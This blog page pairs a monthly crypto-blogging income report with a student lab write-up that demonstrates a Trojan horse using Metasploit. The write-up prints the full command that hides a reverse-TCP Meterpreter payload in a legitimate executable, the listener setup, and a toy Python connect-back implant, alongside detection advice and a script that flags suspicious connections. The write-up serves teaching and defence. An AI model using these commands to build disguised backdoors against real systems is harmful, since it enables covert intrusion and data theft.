November 30, 2020

My Blogger Income November 2020 and Personal Missions

Content Creation

Blogs

Videos

  • LBRY: LBC 0 ≈ $0

Images

Personal Monetization

Common Tasks

Browsing

Cointiply

  • Survey, faucet, etc.: $0

Referrals

Currently the quantity is too much to handle while the value I earned is not much, so I may report this in a separate article.

November 2020 Income ≈ $126.5205

Grade: C

Personal Comments

Yes, I earned $20 less than last month, but I actually feel that I earned more than I expected. I wrote sad things last month and predicted that I could not continue like this much longer. It was sad for me because this would have been an almost perfect life as a full-time content creator if I were living alone, where earning a hundred dollars a month is enough for me. By then, I had made a decision to stop working on my book, stop writing about my ideas, stop pursuing online earnings, and complete my curriculum vitae to increase my chances of getting a job. Yes, this month I was working fully on publishing online any research and scientific writing that I had written in the past during my studies, where I only expected to earn a few pennies, but I never expected that I would reach over a hundred dollars a month once again and receive some supportive comments from people who liked those works. Therefore I would like to express my deepest gratitude to everyone on the platforms that I mentioned above.

Personal Missions

Last month I expressed my sadness at having to give up this dream job, but this month I finally understood the main reason why I was sad. It is not truly because I have to give up my dream job but because I have personal missions that I want to fulfill. This month, I realized what those personal missions are that I subconsciously made long ago:

  1. Publish everything that I have done during my studies to my blog. I accomplished my primary mission long ago, which was publishing my publications, final project, thesis, and dissertation to my blog, and I have almost accomplished my secondary mission, which is posting any research or scientific articles and assignments to my blog. As for the rest of my small assignments, I am willing to post them leisurely and in an indefinite time, with of course a quality that is good enough, at least by my own evaluation.
  2. Write an article about almost all the videos that I uploaded. For example, I wrote a detailed article about my current most popular video, about fixing an Optimus laptop blank screen when installing the Nvidia driver in Kali Linux. One example that I really want to write is my tutorial about upgrading Moodle from version 1 to version 3, conducted on an actual case of elearning.unud.ac.id, which I believe is a significant problem that is rarely discussed.
  3. Finally, I would like to finish my book about cryptocurrency 101 for users. I would like to stay unemployed and focus until I finish this mission, or at least a majority of it. I am willing to put the rest of my desires on the shelf or on the waiting list for an indefinite time. For example, I have more books that I want to write, but if I have to give up on them, then I have to give up.
  4. Not only video record myself playing story video games but also write a detailed story and conversation of the video games. This was inspired by YouTube's timestamps and by the situation, since long ago, that I no longer have time to play story video games but still want to know the story, so I watched the YouTube gameplay briefly. Also, I wanted to be a video game streamer because I was actually a fan of story video games but had to give up playing games after I became busy during my undergraduate studies.
  5. I want to try referral blogging, where I write a good article about a product that has a referral system, put my link there, and see the earnings, while at the same time adding more quantity to my blog. For example, the fourth chapter of my book about cryptocurrency 101 for users.
  6. I wanted to be a YouTuber because I enjoyed it and because of the stories of famous crypto YouTubers, where one actually earns more after quitting his job and doing the work he was passionate about, one of them being a crypto YouTuber. Also a sarcastic remark that if we love Saturdays and hate Mondays, it is an indication that we hate our jobs, and why are we stupid enough to accept how it is for years while other people are enjoying their lives? This happened to me in high school, some years of my undergraduate studies, and my job in 2015. In my graduate studies and now, having found blogging to be my passion more than being a YouTuber, I really felt that the distance between Mondays and Fridays was short. Often during the weekends, I regretted not working more on weekdays and wished I could go back to Monday, where in the end I almost always chose not to take holidays on weekends and just keep blogging.
  7. I became very interested in cryptocurrency and I really want to start learning programming, such as programming Bitcoin and writing smart contracts on Ethereum. Alas, I am in a phase where learning is not appreciated but results, mainly income, are expected. I hope that I am wrong, but the people for whom I wrote this report are probably not interested in this writing but only interested in the numbers above, and that is it: whether it is enough or not, whether the numbers can amaze them or not. So I thank you very much if you really read in detail until this point.

Appendix

Publish0x Earnings
Publish0x Competition Earnings
ReadCash Earnings. Right after the October income report I did not earn anything. Either the admins read it and decided to blacklist me for it and/or the bot detected me as a cross-poster. Well, no matter, I did not come to read.cash for that. I initially came solely because it is another blogging platform, especially a crypto one, where users can tip in Bitcoin Cash, and I want to share my posts with its users. The random rewarder bot was a surprising bonus, and thank you for supporting me last month. I am thankful enough to be allowed to post there and I will continue.
Blurt Earnings
Hive Earnings
Steemit Earnings
Leo Finance and STEM Geeks Earnings
Filearmy Earnings
Bittube Airtime Earnings
Netbox Browser Rewards

Donation

Personally, I enjoyed being a full-time independent content creator very much, and I once again thank the platforms, investors, donors, and viewers for making my venture possible through donations, tips, and upvotes. If you enjoy and/or want to further support my work, you may choose from more forms of donation:

Bitcoin bc1q6hg4lllxthryke7zhxflcdrcm0nr8ph7antxk9, Ethereum 0x3D4c67A2A40bC24ec53ab767b9247c02A2250BCB, Litecoin ltc1qqxl8dng0swv7zuhe30y5kzwht3l25krfaqzu2k, XRP r9rwEdZBWFRbsGzwG5gm1MjDoyBKWLPyx5, Bitcoin Cash qpd74d52rxpt3w70qv555ccq0254j7dhtg2mxst0dc, Binance Chain bnb10hdlv95jyjn92j2l6um6gkmc96a6g57lnezd66, Monero 43V43g1UC9AdgjmjJZPQRxCotyi9VTb8jbYisw2cSqEjbuvp9Y, paypal.me/fajarpurnama.
Animation Source Code

Mirror

November 29, 2020

Trojan Horse Demonstration with Metasploit Framework Payload

Figure 0. Trojan Horse MSFpayload Illustration

Note

This is my undergraduate assignment, which I translated to English myself, from the Data Security System course, where the task was to write an essay on the Trojan horse in groups, but I was also interested in putting it into practice. Therefore, I tried to practice a Trojan horse with the Metasploit Framework. The difference between a Trojan horse and a regular backdoor is that a Trojan horse is disguised as a legitimate program. Apart from me, this group consisted of Dwi Angga Pratama, Yulianti Murprayana, Linda Krisna Dewi, and Agus Riki Gunawan. This task has never been published anywhere, and we as the authors and copyright holders license this task under a customized CC-BY-SA, where anyone can share, copy, republish, and sell it on condition that they state our names as the authors and notify that the original and open version is available here.

Chapter 1 Introduction

1.1 Background

The Trojan horse is one of the most commonly known kinds of malware. In short, it is a program that looks legitimate but carries hidden malicious code, typically a backdoor, which runs when the file is executed. Many people use antivirus software such as AVG, Avast, Avira, Kaspersky, or others, and it is often the case that the antivirus detects Trojans. However, few people know what a Trojan is and how it works. In this experiment, we describe how a Trojan horse works using msfpayload from Metasploit.

1.2 Problem

How does a Trojan horse work?

1.3 Objective

Describe how a Trojan horse works using metasploit.

1.4 Benefit

Get an idea of how a Trojan horse works by seeing the process of breaking into the system firsthand.

1.5 Scope and Limitation

  1. The file used to experiment is a .exe extension.
  2. The backdoor is created with msfpayload and executed with metasploit.
  3. The victim is Windows 7.
  4. Only connected via LAN (Local Area Network).
  5. The victim does not use an antivirus.

Chapter 2 Basic Theory

2.1 Definition of Back Door

A back door is a special access path made by a programmer to enter a system. The programmer inserts certain commands into the operating system, and through these commands a hacker can bypass the steps (such as authentication) that must normally be followed when someone enters the operating system, while the inserted code does not affect the performance of the operating system.

The term backdoor is now used by hackers to refer to a mechanism that allows a system hacker to re-access a system that was attacked before without having to repeat the process of exploiting the system or network, as he did the first time. Generally, after a network has been attacked using an exploit (against a vulnerability), an attacker covers all traces of it on the system by modifying or deleting the system log files, and then installs a backdoor, which is either a piece of special software or a user account that has the access rights of a network administrator or system administrator. If the owner of the network or system later realizes that the system has been attacked and closes all known vulnerabilities in it but does not detect the installed backdoor, the previous attacker will still be able to access the system without the owner noticing, all the more so if he has registered himself as a legitimate user in the system or network. With the rights of a network administrator, he can also do things that damage the system or destroy data. In cases like the one above, the usual remedy is to reinstall the system or network, or to restore from a backup that is known to be clean.

There are several tools that can be used to install a backdoor, such as some Trojan horses, but the most popular is Netcat, which can be used on Windows or UNIX operating systems.

2.2 Trojan Horse Definition

Trojan horses are not classified as viruses: although they share some characteristics, a Trojan does not replicate itself. A Trojan infects a computer via a file that appears harmless and usually does something useful, but eventually it does something dangerous, for example formatting the hard drive.

2.3 How the Trojan Horse Works

A Trojan consists of two parts, the client and the server. The hacker sometimes has to physically plant the Trojan on the victim's computer or lure the victim into executing/opening a file containing the Trojan, but there are also Trojans that infect the victim directly given only the victim's IP address, such as Kaht. When the victim unknowingly runs the file containing the Trojan on his computer, the attacker uses the client to connect to the server and begins to use the Trojan. TCP/IP is the protocol family commonly used for this communication; Trojans work well over TCP, but some Trojans can also use UDP. When the server starts (on the victim's computer), the Trojan generally tries to hide itself somewhere in the computer system, then opens one or more ports to receive connections, and modifies the registry and/or uses some other autostart method so that the Trojan is automatically activated when the computer is turned on. Note that the direction of the connection can also be reversed: the payload used in Chapter 3 (reverse_tcp) has the victim's computer connect out to the attacker's listener, which passes through NAT and firewalls that only block inbound connections. Trojans are very dangerous for computer users connected to a network or the Internet, because the hacker can steal sensitive data such as e-mail passwords, dial-up passwords, web service passwords, e-mail addresses, work documents, Internet banking, PayPal, e-gold and credit card details, and so on.

2.4 Types of Trojan Horse

2.4.1 Trojan Remote Access

Remote Access Trojans are among the most popular Trojans today. Many attackers use this Trojan because it has many functions and is very easy to use. The process is to wait for someone to run the Trojan, which functions as a server; once the attacker has the victim's IP address, the attacker can take full control of the victim's computer. An example of this type is Back Orifice (BO), which consists of BOSERVE.EXE, run on the victim's computer, and BOGUI.EXE, run by the attacker to access the victim's computer.

2.4.2 Password Sending Trojan

The purpose of this type of Trojan is to send passwords found on the victim's computer or entered on the Internet to a special e-mail address prepared by the attacker. Examples of intercepted passwords are those for ICQ, IRC, FTP, HTTP or other applications that require the user to enter a login and password. Most of these Trojans use port 25 (SMTP) to send the e-mail. This type is very dangerous if there are very important passwords on the computer.

2.4.3 File Transfer Protocol (FTP) Trojan

The FTP Trojan is the simplest and is considered outdated. Its only function is to open port 21 on the victim's computer, which lets anyone with an FTP client enter the victim's computer without a password and download or upload files.

2.4.4 Keyloggers

Keyloggers are a simple type of Trojan whose function is to record keystrokes while the victim is typing and save them in a log file. If the keystrokes include a user name and password, both can be obtained by the attacker by reading the log file. This Trojan can run whether the computer is online or offline. It can detect when the victim is online and record everything; when offline, recording starts after Windows starts and the log is stored on the victim's hard drive, waiting for the computer to go online so that it can be transferred to, or collected by, the attacker.

2.4.5 Trojan Destroyer

Destructive Trojans do not aim to steal data; their only function is to delete or corrupt files on the victim's computer, typically system or program files (such as .dll, .ini or .exe files), either immediately, on a set date, or on the attacker's command, so that the system or an application stops working.

2.4.6 Trojan Denial of Service (DoS) Attack

The DoS-attack Trojan is currently one of the most popular. This Trojan can carry out Distributed DoS (DDoS) if it has enough victims. The main idea is that if the attacker has, say, 200 infected victims on ADSL and makes them attack a target simultaneously, the result is very dense traffic from the insistent requests, exceeding the bandwidth capacity of the target and cutting off its Internet access. WinTrinoo has been a very popular DDoS tool recently, and if an attacker has infected enough ADSL users, some of the main Internet sites can collapse. Another variation of the DoS Trojan is the mail-bomb Trojan, whose main purpose is to infect as many computers as possible and to simultaneously attack specific e-mail addresses and other specific addresses with random subjects and content that cannot be filtered.

2.4.7 Proxy/Wingate Trojan

The Trojan maker dresses this Trojan up attractively to trick the victim into running a Proxy/Wingate server on his computer, which is then made available to the whole world or only to the attacker. Proxy/Wingate Trojans are used for anonymous Telnet, ICQ and IRC, for registering domains with stolen credit card numbers, and for other unauthorized activities. This Trojan gives the attacker anonymity and the opportunity to do anything from the victim's computer while leaving an untraceable trail.

2.4.8 Software Detection Killers

Some Trojans are equipped with the ability to disable detection software, and there are also standalone programs with the same function. Examples of detection software that can be disabled are ZoneAlarm, Norton AntiVirus and other antivirus/firewall programs that protect the computer. Once the detection software is disabled, the attacker has full access to the victim's computer to carry out unauthorized activities and to use the victim's computer to attack other computers.

2.5 How to Overcome the Dangers of a Trojan Horse

2.5.1 Task List

Detection by looking at the list of running programs in the task list. The list is displayed by pressing CTRL+ALT+DEL or by right-clicking the taskbar and clicking Task Manager. Besides finding out which programs are running, the user can terminate a program that looks strange or suspicious. However, some Trojans can still hide from this task list. To see which programs are running as a whole, open the System Information utility (msinfo32.exe), which on older Windows versions is in C:\Program Files\Common Files\Microsoft Shared\MSInfo (on Windows 7 it is in C:\Windows\System32), and look under Software Environment, Running Tasks. This tool lists all running processes, whether hidden from the task list or not. Things to check are the path, file name, file properties and the running *.exe and *.dll files.

2.5.2 Netstat

All Trojans need to communicate; if they cannot communicate, their goal is in vain. This is the main weakness of Trojans: communicating means they leave a trail that can be traced. The netstat command lists the connections to and from a computer. When executed, it shows the local address and port and the remote address and port of each connection, and with the -o option on Windows also the PID of the process that owns it. If an IP address is found that is not known, it needs to be investigated further, tracing which process holds the connection and where it leads.

2.5.3 TCP View

TCPView is a free utility from Sysinternals that displays, for every TCP and UDP endpoint, the local and remote address together with the program that owns it, so that a connection to an unknown address can be tied to a process. With this information an attack can be recognized and the Trojan removed: some antivirus software can identify and remove Trojans; Trojan scanner software is made specifically to detect and remove Trojans; and the most drastic way is to reinstall the computer.
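The netstat and TCPView check from sections 2.5.2 and 2.5.3, as an added example that is not part of the original assignment: a script that joins the output of "netstat -ano" (which includes the owning PID) with "tasklist" to name the process behind every established connection to a remote host, and flags processes outside a small allowlist, as well as PIDs that do not appear in the task list at all (a process hiding from the task list, as 2.5.1 warns). Both outputs are constructed samples modelled on this essay's lab, with mdma1.exe holding the connection to 192.168.0.1:443; the allowlist is an illustrative assumption, not a real baseline.

```python
from ipaddress import ip_address

# Added example, not the assignment's code. Constructed "netstat -ano" output
# modelled on the lab: mdma1.exe (PID 2312) holds the reverse connection to the
# attacker at 192.168.0.1:443; PID 3999 is a process hidden from the task list.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       700
  TCP    127.0.0.1:49155        127.0.0.1:49156        ESTABLISHED     1024
  TCP    192.168.0.2:49160      192.168.0.1:443        ESTABLISHED     2312
  TCP    192.168.0.2:49201      93.184.216.34:443      ESTABLISHED     1840
  TCP    192.168.0.2:49310      203.0.113.7:8080       ESTABLISHED     3999
  UDP    0.0.0.0:5355           *:*                                    1100
"""

# Constructed "tasklist" output for the same machine (PID 3999 is absent).
TASKLIST_SAMPLE = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
svchost.exe                    700 Services                   0      7,900 K
svchost.exe                   1024 Services                   0      9,112 K
svchost.exe                   1100 Services                   0      4,336 K
firefox.exe                   1840 Console                    1    180,240 K
mdma1.exe                     2312 Console                    1      5,120 K
"""

# Processes expected to hold outbound connections on this host. Assumed for
# the example; a real allowlist comes from a known-clean baseline of the box.
ALLOWED_NETWORK_PROCESSES = {"firefox.exe", "svchost.exe"}


def parse_netstat(text):
    """Return one dict per TCP/UDP row of 'netstat -ano' output."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue  # banner, header and blank lines
        state = parts[3] if len(parts) == 5 else ""  # UDP rows carry no state
        rows.append({"proto": parts[0], "local": parts[1], "remote": parts[2],
                     "state": state, "pid": int(parts[-1])})
    return rows


def parse_tasklist(text):
    """Map PID -> image name from 'tasklist' output (rows after the ==== line)."""
    pid_to_name, in_table = {}, False
    for line in text.splitlines():
        if line.startswith("="):
            in_table = True
            continue
        parts = line.split()
        if in_table and len(parts) >= 2 and parts[1].isdigit():
            # Image names containing spaces would need fixed-width parsing.
            pid_to_name[int(parts[1])] = parts[0]
    return pid_to_name


def _is_remote(addr):
    """True when the foreign address is a real host, not loopback/wildcard."""
    host = addr.rsplit(":", 1)[0].strip("[]")
    try:
        ip = ip_address(host)
    except ValueError:  # '*' placeholder on UDP rows
        return False
    return not (ip.is_loopback or ip.is_unspecified)


def suspicious_connections(netstat_text, tasklist_text,
                           allowed=ALLOWED_NETWORK_PROCESSES):
    """Established connections to remote hosts owned by a process that is not
    on the allowlist, or by a PID with no task-list entry at all."""
    names = parse_tasklist(tasklist_text)
    findings = []
    for row in parse_netstat(netstat_text):
        if row["state"] != "ESTABLISHED" or not _is_remote(row["remote"]):
            continue
        name = names.get(row["pid"], "<not in tasklist>")
        if name not in allowed:
            findings.append({"pid": row["pid"], "process": name,
                             "local": row["local"], "remote": row["remote"]})
    return findings


if __name__ == "__main__":
    for f in suspicious_connections(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"PID {f['pid']:>5} {f['process']:<20} {f['local']} -> {f['remote']}")
```

On a live Windows 7 box the same join is done by hand with "netstat -ano" followed by "tasklist /FI "PID eq 2312"", or visually in TCPView, which shows the owning process next to each endpoint. The loopback filter matters: a reverse payload on a victim shows up as an ordinary outbound connection to the attacker's LHOST:LPORT, so the tell is not a listening port but an established session held by a program that should not be talking to the network.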

2.6 Metasploit Definition

Metasploit is a security framework that is often used to test the resilience of a system by exploiting weaknesses in the system's software. It is usually used to attack the application layer with exploits for known but unpatched vulnerabilities, and occasionally with 0-day exploits, i.e. attacks on vulnerabilities for which no patch exists yet. Metasploit is usually associated with the term remote exploitation, meaning that the attacker controls the victim's computer from a distance. Metasploit attacks by sending an exploit to the victim's computer, and the exploit carries a payload chosen by the attacker. An exploit is a piece of software that abuses a weakness in the victim's software (for example a web browser); once it succeeds, the exploit loads the payload into the victim's memory. The payload is the attacker's executable code, run on the victim's computer with the aim of remotely controlling it or installing backdoors, Trojans, viruses, worms, and so on. In this experiment no exploit is needed, because the victim runs the payload himself, so only Metasploit's handler side is used. Apart from Metasploit being misused for crime, this software also helps system security staff strengthen their network defenses against outside attackers.

Chapter 3 Experimental Method

3.1 Place and Time of Experiment

The experiment was carried out at home at Jln. Kusuma Bangsa 5, Denpasar, Bali. Trial time on Monday, April 5, 2013, at 23:00 - 24:00.

3.2 Tools and Materials

Laptop ACER

  • Intel® Pentium® dual – core processor T4200 (2.0 GHz, 800 MHz FSB, 1 MB L2 cache)
  • Mobile Intel® Graphics Media Accelerator 4500MHD
  • 1GB DDR2
  • 128 WXGA Acer CrystalBriteTM LCD
  • 250GB HDD
  • Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet Controller
  • Atheros Communications Inc. AR928X Wireless Network Adapter
  • Operating System Linux Backtrack 5 R3 32 bit

PC

  • Intel® Pentium® core i5 processor
  • 4 GB RAM
  • 1GB VGA
  • Gigabit Ethernet Controller
  • Alcor Micro, Corp. USB 2.0 PC Camera
  • Operating System Windows 7 Ultimate 32 bit

3.3 Experiment Steps

If you do not have Metasploit, install it with the command "apt-get install metasploit apache2"; apache2 is installed alongside it because Metasploit 4.5 is licensed and set up through its web interface. Then open a browser and go to https://localhost:3790. Get the license, then update from the terminal with the command "msfupdate". If this worked, there will be a folder /opt/metasploit.

Figure 3.1 Install metasploit

To see the payload types provided by Metasploit, use "msfpayload -l". We will use windows/meterpreter/reverse_tcp: the payload runs on the victim and connects back (reverse) over TCP to the attacker's listener, so the victim initiates the connection, which is why it works from behind NAT or a firewall that only blocks inbound connections.

Figure 3.2 Viewing the payloads provided by metasploit 1
Figure 3.3 Viewing the payloads provided by metasploit 2

Find the IP address of the attacker's network interface, i.e. the address the victim will connect back to, with the command "ifconfig". Here the IP address is 192.168.0.1.

Figure 3.4 Viewing the IP address of the network device

Here the file that will carry the payload is mdma.exe, placed in /root. The command is "msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/mdma.exe -k -o /root/mdma1.exe". LHOST is the listening host, i.e. the IP address of this network interface, which the payload connects back to; LPORT is the listening port, chosen to taste; R tells msfpayload to emit the raw payload bytes so that they can be piped into msfencode. It is msfencode's template options that turn the payload into a Trojan: -e selects the encoder (x86/shikata_ga_nai, a polymorphic XOR encoder), -c the number of encoding iterations, -t the output format (exe), -x the legitimate executable used as the template, -k keeps the template's original code running and launches the payload in a separate thread, and -o the path and name of the new file. Two caveats for anyone repeating this today: encoding with shikata_ga_nai does not meaningfully evade current antivirus products, which detect Meterpreter payloads by signature and behaviour regardless of the encoder, so the "no antivirus" limitation in section 1.5 is essential; and msfpayload and msfencode were removed from Metasploit in 2015 and replaced by msfvenom, where the same options are -p (payload), -e (encoder), -i (iterations), -f (format), -x (template), -k (keep) and -o (output).

Figure 3.5 Creating the backdoor

Start msfconsole to control the victim's computer. Type "help" if you are not familiar with the commands. The "search [any word]" command lists the modules related to the word typed.

Figure 3.6 Msfconsole

Type the command "use exploit/multi/handler" (the generic handler that waits for a payload to connect back). Next, type the command "set payload windows/meterpreter/reverse_tcp" (the payload used).

Figure 3.7 Using exploit/multi/handler
Figure 3.8 Using windows/meterpreter/reverse_tcp

Continue with the commands "set lhost 192.168.0.1" (the listening host) and "set lport 443" (the listening port); these must match the LHOST and LPORT compiled into mdma1.exe. Type "show options" to check the settings.

Figure 3.9 Setting the options

The last command is "exploit"; the handler then waits for the victim to run mdma1.exe, and a Meterpreter session opens as soon as the payload connects back.

Figure 3.10 The exploit command
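The two halves of the procedure above, as an added example that is not part of the original assignment: a toy reverse-TCP handler and implant on loopback, playing the roles of exploit/multi/handler waiting on LHOST:LPORT and of the reverse_tcp payload that connects out to it once the victim runs the file (the client/server split of section 2.3, with the victim initiating the connection). The line-delimited JSON protocol, the command names and the function names are assumptions made for the example; none of it is Meterpreter's wire format, and the implant only answers a fixed set of harmless queries.

```python
import json
import os
import platform
import socket
import threading

# Added example, not the assignment's code. A hypothetical line-delimited JSON
# protocol between an attacker-side "handler" and a victim-side "implant".


def _send(sock, obj):
    sock.sendall(json.dumps(obj).encode() + b"\n")


def _recv(sock):
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return json.loads(buf)


def implant(lhost, lport):
    """Victim side (the reverse_tcp role): connect *out* to the handler,
    announce itself, then answer a fixed set of benign queries until told to exit."""
    queries = {
        "sysinfo": lambda: {"os": platform.system(), "host": platform.node()},
        "getcwd": lambda: {"cwd": os.getcwd()},
    }
    with socket.create_connection((lhost, lport)) as s:
        _send(s, {"hello": "implant", "pid": os.getpid()})
        while True:
            cmd = _recv(s)["cmd"]
            if cmd == "exit":
                return
            fn = queries.get(cmd)
            _send(s, fn() if fn else {"error": "unknown command"})


def handler(listener, commands):
    """Attacker side (the exploit/multi/handler role): accept one connect-back,
    drive the implant with commands and collect its answers."""
    conn, (peer_ip, _) = listener.accept()
    with conn:
        results = {"hello": _recv(conn), "peer": peer_ip}
        for cmd in commands:
            _send(conn, {"cmd": cmd})
            results[cmd] = _recv(conn)
        _send(conn, {"cmd": "exit"})
    return results


def run_demo(commands=("sysinfo", "getcwd", "bogus")):
    """Bind the handler first (as 'exploit' in msfconsole does), then
    'run the trojan' in a thread so that it connects back to LHOST:LPORT."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
        listener.bind(("127.0.0.1", 0))  # port 0: let the OS choose a free LPORT
        listener.listen(1)
        lport = listener.getsockname()[1]
        t = threading.Thread(target=implant, args=("127.0.0.1", lport), daemon=True)
        t.start()
        results = handler(listener, commands)
        t.join(timeout=5)
    return results


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The order of operations is the point: the listener must be bound before the file is run on the victim, otherwise the connect-back fails and the payload simply exits, which is why the procedure ends with "exploit" and then waits. From the victim's side the session is an ordinary outbound TCP connection, which is what the netstat/TCPView check in section 2.5 looks for.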

Chapter 4 Discussion

4.1 Entering the victim's PC with the backdoor that has been created

The assumption is that the victim's PC is not using antivirus and that the victim is sent the mdma1.exe file and runs it. The program appears to run as usual, but access is opened from the attacker's PC. The following shows the IP configuration of the victim's PC and the access obtained:

Figure 4.1 The mdma1.exe file that will be sent to the victim's PC
Figure 4.2 IP address of the victim's PC
Figure 4.3 The victim opens the mdma1.exe file
Figure 4.4 The attacker's PC gets access
Figure 4.5 The contents of partition D seen on the victim's PC
Figure 4.6 The contents of partition D seen from the attacker's PC

Chapter 5 Closing

5.1 Conclusion

The experiment illustrates that Trojan horses, backdoors and the like work in secret. The malware is inserted into a file and runs when the file is executed. The file works as usual but also performs another task determined by the inserted malware. In this experiment, the malware's task was to give the attacker's PC access to the victim's PC: the attacker obtained a Meterpreter session running with the privileges of the user who launched mdma1.exe, which was enough to browse the victim's partition D.

5.2 Future Work

This experiment can be developed further, for example with the victim's PC using antivirus, with operating systems other than Windows, or with other variations. One can also use tools other than msfpayload, write one's own program, create new Trojan concepts, and so on.

Mirror

Demonstrasi Trojan Horse dengan Metasploit Framework Payload

Illustrasi Trojan Horse MSFpayload
Gambar 0. Illustrasi Trojan Horse MSFpayload

Catatan

Ini merupakan tugas S1 saya di mata kuliah Sistem Keamanan Data dimana tugasnya adalah menuis essai mengenai Trojan Horse berkelompok namun saya juga tertarik untuk mempraktikannya. Oleh karena itu saya coba mempraktikan trojan horse dengan metasploit framework. Bedanya trojan horse dengan backdoor biasa adalah trojan horse menyamar sebagai program sah. Selain saya kelompok ini terdiri dari Dwi Angga Pratama, Yulianti Murprayana, Linda Krisna Dewi, dan Agus Riki Gunawan. Tugas ini tidak pernah dipublikasi dimanapun dan kami sebagai penulis dan pemegang hak cipta melisensi tugas ini customized CC-BY-SA dimana siapa saja boleh membagi, menyalin, mempublikasi ulang, dan menjualnya dengan syarat mencatumkan nama kami sebagai penulis dan memberitahu bahwa versi asli dan terbuka tersedia disini.

BAB 1 Pendahuluan

1.1 Latar Belakang

Trojan horse merupakan suatu malware yang umum kita ketahui. Secara singkat dia merupakan suatu backdoor dimana malware ini dilampirkan pada suatu file lalu dia akan bekerja jika file tersebut dijalankan. Di kalangan masyarakat banyak menggunakan antivirus seperti AVG, Avast, Avira, Kaspersky, atau lain-lainnya dan sering kejadian bahwa antivirus tersebut mendeteksi trojan. Namun baru sedikit yang mengetahui trojan itu apa dan bagaimana dia bekerja. Pada percobaan ini akan di gambarkan bagaimana trojan horse dengan menggunakan msfpayload dari metasploit.

1.2 Rumusan Masalah

Bagaimana gambaran trojan horse bekerja?

1.3 Tujuan

Menggambarkan cara kerja trojan horse dengan menggunakan metasploit.

1.4 Manfaat

Mendapatkan gambaran bagaimana trojan horse bekerja dengan melihat proses pembobolan sistem secara langsung.

1.5 Ruang Lingkup dan Batasan

  • File yang digunakan untuk percobaan dengan extensi .exe.
  • Backdoor dibuat dengan msfpayload dan dijalankan dengan metasploit.
  • Korban adalah Windows 7.
  • Hanya terkoneksi secara LAN (Local Area Network).
  • Korban tidak menggunakan antivirus.
  • BAB 2 Dasar Teori

    2.1 Pengertian Back Door

    Back door merupakan akses khusus yang dibuat oleh seorang programmer untuk dapat masuk ke dalam sistem. Di dalam sistem operasi seorang programmer memasukkan perintah-perintah tertentu. Dari perintah-perintah inilah seorang hacker dapat melewati perintah-perintah yang harus dilalui apabila seseorang memasuki suatu sistem operasi tapi kode-kode yang disisipkan tersebut tidak mempengaruhi kinerja sistem operasi.

    Istilah backdoor sekarang digunakan oleh hacker-hacker untuk merujuk kepada mekanisme yang mengizinkan seorang peretas sistem dapat mengakses kembali sebuah sistem yang telah diserang sebelumnya tanpa harus mengulangi proses eksploitasi terhadap sistem atau jaringan tersebut, seperti yang ia lakukan pertama kali. Umumnya, setelah sebuah jaringan telah diserang dengan menggunakan exploit (terhadap sebuah kerawanan/vulnerability), seorang penyerang akan menutupi semua jejaknya di dalam sistem yang bersangkutan dengan memodifikasi berkas catatan sistem (log) atau menghapusnya, dan kemudian menginstalasikan sebuah backdoor yang berupa sebuah perangkat lunak khusus atau menambahkan sebuah akun pengguna yang memiliki hak akses sebagai administrator jaringan atau administrator sistem tersebut. Jika kemudian pemilik jaringan atau sistem tersebut menyadari bahwa sistemnya telah diserang, dan kemudian menutup semua kerawanan yang diketahui dalam sistemnya (tapi tidak mendeteksi adanya backdoor yang terinstalasi), penyerang yang sebelumnya masih akan dapat mengakses sistem yang bersangkutan, tanpa ketahuan oleh pemilik jaringan, apalagi setelah dirinya mendaftarkan diri sebagai pengguna yang sah di dalam sistem atau jaringan tersebut. Dengan memiliki hak sebagai administrator jaringan, ia pun dapat melakukan hal yang dapat merusak sistem atau menghilangkan data. Dalam kasus seperti di atas, cara yang umum digunakan adalah dengan melakukan instalasi ulang terhadap sistem atau jaringan, atau dengan melakukan restorasi dari cadangan/backup yang masih bersih dari backdoor.

    Ada beberapa perangkat yang dapat digunakan untuk menginstalasikan backdoor, seperti halnya beberapa Trojan horse, tetapi yang populer adalah Netcat, yang dapat digunakan di dalam sistem operasi Windows ataupun UNIX.

    2.2 Pengertian Trojan Horse

    Trojan Horse ini disebut kuda troya dimana trojan horse tidak menyebar seperti lain. Trojan horse tidak tergolong virus walaupun karakteristiknya sama, Trojan menginfeksi computer melalui file yang kelihatannya tidak berbahaya dan biasanya justru melakukan sesuatu yang berguna. Namun akhirnya virus menjadi berbahaya, misalnya saat melakukan format hardisk.

    2.3 Cara Kerja Trojan Hourse

    Trojan masuk melalui dua bagian, yaitu bagian client dan server. Jadi hacker kadang harus berjalan menanamkan trojannya di komputer korban ataupun memancing agar sang korban mengeksekusi/membuka file yang mengandung Trojan, namun ada juga Trojan yang langsung menginfeksi korbannya hanya dengan berbekal ip korban misalnya Kaht. Ketika korban (tanpa diketahui) menjalankan file yang mengandung Trojan pada komputernya, kemudian penyerang akan menggunakan client untuk koneksi dengan server dan mulai menggunakan trojan. Protokol TCP/IP adalah jenis protokol yang umum digunakan untuk komunikasi, Trojan dapat bekerja dengan baik dengan jenis protokol ini, tetapi beberapa trojan juga dapat menggunakan protokol UDP dengan baik. Ketika server mulai dijalankan (pada komputer korban), Trojan umumnya mencoba untuk menyembunyikan diri di suatu tempat dalam sistem komputer tersebut, kemudian mulai membuka beberapa port untuk melakukan koneksi, memodifikasi registry dan atau menggunakan metode lain yaitu metode autostarting agar trojan menjadi otomatis aktif saat komputer dihidupkan. Trojan sangat berbahaya bagi pengguna komputer yang tersambung jaringan komputer atau internet, karena bisa jadi hacker bisa mencuri data-data sensitif misalnya password email, dial-up passwords, webservices passwords, e-mail address, dokumen pekerjaan, internet banking, paypal, e-gold,kartu kredit dan lain-lain.

    2.4 Macam-macam Trojan Hourse

    2.4.1 Trojan Remote Access

